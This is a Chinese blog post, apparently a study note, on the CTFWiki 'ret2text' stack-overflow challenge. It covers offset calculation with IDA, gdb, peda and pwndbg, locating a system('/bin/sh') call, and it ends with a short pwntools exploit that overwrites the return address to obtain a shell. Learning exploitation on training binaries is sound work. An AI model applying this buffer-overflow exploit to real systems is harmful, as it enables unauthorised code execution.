pwn栈溢出学习 基本ROP——ret2text

本文详细介绍了如何通过检查栈特性、IDA Pro分析、gdb调试来计算栈溢出时ret2text的攻击路径。涉及步骤包括检查NX保护、计算s相对于ebp的偏移、定位system函数地址,并利用gdb获取覆盖数据大小,最终编写并执行exploit。
摘要由CSDN通过智能技术生成

CTFWiki 栈溢出 ret2text

1.checksec跑一下

在这里插入图片描述

  • NX enable :栈不可执行
  • 对于这个题目来说执不执行都无所谓

2.IDA pro看一下

2.1. 计算s相对ebp的偏移量

2.1.1. 手动计算

在这里插入图片描述

  • 看到一个危险函数 gets()
  • 看到[esp + 1ch] [ebp - 64h]
  • 这个时候我们要算一下需要发送多少数据才能覆盖栈
  • 这两个方括号里面代表的是 s 分别到 esp 和 ebp 的距离
  • 我们想要的得到的是ebp - s 的值
  • 因此我们要算出 s 的地址
  • s的地址就应该是esp+1c
    这里附上图看看
    在这里插入图片描述
  • ebp指向栈底 是高地址
  • esp指向栈顶 是低地址
  • s距离esp的偏移是0x1c
  • 下面看看gdb动态调试
  • 在学习gdb的时候遇到的诸多问题请看我写的另一篇文章
    点至这里阅读原文

2.1.2. 直接使用peda计算

pattern create 200
pattren offset 溢出地址

在这里插入图片描述

2.1.3 用pwndbg计算

cyclic 100           //生成100个byte数据
cyclic -l 溢出地址

看一下样例
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注:2.1.3是非本题样例

2.2 看一下system函数

在这里插入图片描述

  • 在secure函数中有调用system函数
  • 我们直接找到调用system("/bin/sh")的地址
    在这里插入图片描述
    target = 0804863A

3.gdb动态调试获取覆盖数据大小

在这里插入图片描述

  • s 相对于 ebp 的偏移为 0x188 - 100 + 0x1c = 0x6c
  • s 相对于返回地址的偏移为 0x6c+4

4.编写exp

from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * (0x6c+4) + p32(target))
sh.interactive()

在这里插入图片描述
可以看到运行之后成功的拿到了权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值